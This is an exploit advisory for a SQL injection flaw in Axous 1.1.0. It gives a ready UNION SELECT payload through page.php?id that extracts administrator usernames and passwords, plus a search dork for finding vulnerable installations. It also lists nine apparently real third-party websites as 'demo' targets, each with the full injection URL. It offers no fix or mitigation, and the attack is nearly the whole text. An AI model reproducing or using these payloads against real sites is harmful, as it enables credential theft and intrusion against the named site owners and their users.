Axous version 1.1.0 suffers from a remote SQL injection vulnerability.
e9948fa9200ad4db8083462993af50e305230c67a4e37f8f39bb90435b21c872
########################################################################################
# #
# Exploit Title : Axous 1.1.0 SQL Injection Vulnerabilitiy #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Version : All Version #
# #
# Vendor Link : www.axous.com #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# DorK : intext:"Powered by Axous 1.1.0" #
# #
# #
########################################################################################
# Exploit:
#
#
# http://[target]/page.php?id=[SQL]
#
# [~] SQL :
#
# page.php?id=-1+union+select+1,group_concat(id,0x3a,username,0x3a,password),3+from+fdb_administrators--
#
#
# [~] Demo:
#
# fanssofts.com/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--
# www.ezprog.com/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--
# legendpcsoft.com/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+fro+fdb_administrators--
# zj-fountain.com/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--
# shop.krown-products.net/axous/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--
# d-softs.com/axous/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--
# multiwan.do-share.com/homepage/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--
# seller247.net/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--
# lotto-lotterysoftware.com/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--
#
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################